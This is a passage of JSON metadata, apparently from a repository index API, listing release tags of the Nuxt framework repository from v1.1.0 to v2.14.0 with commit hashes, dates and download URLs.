},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.g